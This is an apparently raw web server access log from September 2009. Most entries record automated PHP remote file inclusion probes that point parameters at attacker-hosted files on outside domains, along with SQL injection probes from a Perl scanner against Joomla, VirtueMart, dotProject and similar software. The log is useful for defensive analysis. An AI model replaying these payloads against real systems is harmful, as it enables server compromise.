211.233.69.41 - - [12/Sep/2009:01:31:03 -0400] "GET /logs/access_log.Q109061100%20%20///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:31:26 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:31:26 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:31:26 -0400] "GET /logs/access_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:31:46 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:31:46 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:49 -0400] "GET /logs/access_log.Q109051700%20%20//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:31:50 -0400] "GET /logs/access_log.Q109061100%20%20///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:57 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:57 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:31:57 -0400] "GET /logs/access_log.Q109080700//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:32:03 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:33:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.10.17.10 - - [12/Sep/2009:01:35:21 -0400] "GET /logs/access_log.Q109071100/?page=shop/flypage&product_id=' HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:21 -0400] "GET /logs/access_log.Q109071100/?page=shop/flypage&product_id=' HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:21 -0400] "GET /logs/access_log.Q109071100/?page=shop/flypage&product_id=' HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:21 -0400] "GET /?page=shop/flypage&product_id=' HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:21 -0400] "GET /?page=shop/flypage&product_id=' HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:21 -0400] "GET /?page=shop/flypage&product_id=' HTTP/1.1" 200 409 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:22 -0400] "GET /logs/?page=shop/flypage&product_id=' HTTP/1.1" 200 17498 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:22 -0400] "GET /logs/?page=shop/flypage&product_id=' HTTP/1.1" 200 17498 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:35:22 -0400] "GET /logs/?page=shop/flypage&product_id=' HTTP/1.1" 200 17498 "-" "libwww-perl/5.808"
222.73.17.7 - - [12/Sep/2009:01:37:17 -0400] "GET /logs/access_log.Q109080100%20%20/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:17 -0400] "GET /logs/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:17 -0400] "GET /forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:23 -0400] "GET /logs/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:23 -0400] "GET /logs/access_log.Q109080100%20%20/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:23 -0400] "GET /forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:24 -0400] "GET /forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:24 -0400] "GET /logs/access_log.Q109080100%20%20/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:37:24 -0400] "GET /logs/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:03 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:03 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:03 -0400] "GET /logs/access_log.Q109081200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:05 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:05 -0400] "GET /logs/access_log.Q109081200///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:07 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:12 -0400] "GET /logs/access_log.Q109051600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:38:13 -0400] "GET /logs/access_log.Q109051600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:38:18 -0400] "GET /logs/access_log.Q109080200%20%20/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:38:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [12/Sep/2009:01:38:24 -0400] "GET /logs/access_log.Q109080200%20%20/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:38:28 -0400] "GET /logs/access_log.Q109080200%20%20/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:40:18 -0400] "GET /phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:40:18 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:40:18 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:40:34 -0400] "GET /logs/access_log.Q109080800%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:40:36 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:01:40:56 -0400] "GET /logs/access_log.Q109090600%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.10.17.10 - - [12/Sep/2009:01:42:06 -0400] "GET /logs/error_log.Q109071100/?page=shop/flypage&product_id=' HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:42:06 -0400] "GET /logs/error_log.Q109071100/?page=shop/flypage&product_id=' HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
211.10.17.10 - - [12/Sep/2009:01:42:07 -0400] "GET /logs/error_log.Q109071100/?page=shop/flypage&product_id=' HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
211.110.11.75 - - [12/Sep/2009:01:42:09 -0400] "GET /logs/access_log.Q109080800%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:01:42:13 -0400] "GET /logs/error_log.Q109091000 HTTP/1.0" 200 3095222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.110.11.75 - - [12/Sep/2009:01:42:19 -0400] "GET /logs/access_log.Q109090600%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:01:42:17 -0400] "GET /logs/error_log.Q109091000 HTTP/1.0" 200 3095222 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.18.236.8 - - [12/Sep/2009:01:42:50 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:42:50 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:42:50 -0400] "GET /phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.18.236.8 - - [12/Sep/2009:01:43:00 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:43:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.167 - - [12/Sep/2009:01:43:27 -0400] "GET /logs/error_log.Q109090900 HTTP/1.0" 200 2396698 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.167 - - [12/Sep/2009:01:43:30 -0400] "GET /logs/error_log.Q109090900 HTTP/1.0" 200 2396698 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
190.144.44.36 - - [12/Sep/2009:01:43:58 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:43:58 -0400] "GET /logs/access_log.Q109062000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:43:58 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:44:59 -0400] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:44:59 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:44:59 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:45:19 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:45:19 -0400] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:45:19 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.238.14.183 - - [12/Sep/2009:01:45:22 -0400] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
211.238.14.183 - - [12/Sep/2009:01:45:22 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.238.14.183 - - [12/Sep/2009:01:45:22 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:45:29 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:45:29 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:45:29 -0400] "GET /logs/access_log.Q109062000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:45:54 -0400] "GET /logs/access_log.Q109062000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:01:45:57 -0400] "GET /logs/access_log.Q109081200%20%20//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:46:56 -0400] "GET /forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:46:56 -0400] "GET /logs/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:46:56 -0400] "GET /logs/access_log.Q109080100/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:02 -0400] "GET /forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:02 -0400] "GET /logs/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:02 -0400] "GET /logs/access_log.Q109080100/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:04 -0400] "GET /forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:04 -0400] "GET /logs/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:04 -0400] "GET /logs/access_log.Q109080100/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:33 -0400] "GET /logs/access_log.Q109080200/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:40 -0400] "GET /logs/access_log.Q109080200/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.73.17.7 - - [12/Sep/2009:01:47:41 -0400] "GET /logs/access_log.Q109080200/forgot_password.php?inc_dir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:48:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.201 - - [12/Sep/2009:01:48:44 -0400] "GET /images/index8_Ace_stergz.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
206.225.95.33 - - [12/Sep/2009:01:48:59 -0400] "GET ////skin/ggambo6200_pds/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:48:59 -0400] "GET /logs/access_log.Q109061000%20%20////skin/ggambo6200_pds/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:48:59 -0400] "GET /logs//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:48:59 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:48:59 -0400] "GET //include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:48:59 -0400] "GET /logs////skin/ggambo6200_pds/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:49:00 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:49:00 -0400] "GET /logs/access_log.Q109062000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:49:00 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:49:14 -0400] "GET /logs/access_log.Q109061000%20%20////skin/ggambo6200_pds/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:49:14 -0400] "GET ////skin/ggambo6200_pds/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:49:14 -0400] "GET /logs////skin/ggambo6200_pds/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:49:44 -0400] "GET /logs/access_log.Q109070300%20%20//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:49:44 -0400] "GET /logs//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:49:44 -0400] "GET /logs/error_log.Q109060300%20%20//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:49:44 -0400] "GET //_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:50:06 -0400] "GET /logs/access_log.Q109080100//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:50:34 -0400] "GET //_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:50:34 -0400] "GET /logs//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:50:34 -0400] "GET /logs/error_log.Q109060300%20%20//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:50:35 -0400] "GET /logs/access_log.Q109070300%20%20//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:50:38 -0400] "GET /logs/access_log.Q109062000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:53:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:01:54:55 -0400] "GET /logs/access_log.Q109052100%20%20/dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:54:55 -0400] "GET /dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:54:55 -0400] "GET /logs/dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:55:39 -0400] "GET /dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:55:39 -0400] "GET /logs/dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:55:39 -0400] "GET /logs/access_log.Q109052100%20%20/dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:55:40 -0400] "GET /dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:55:40 -0400] "GET /logs/dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:55:40 -0400] "GET /logs/access_log.Q109052100%20%20/dotproject/modules/files/index_table.php?root_dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:31 -0400] "GET /logs/access_log.Q109081600//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:31 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:35 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:36 -0400] "GET /logs/access_log.Q109081600//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
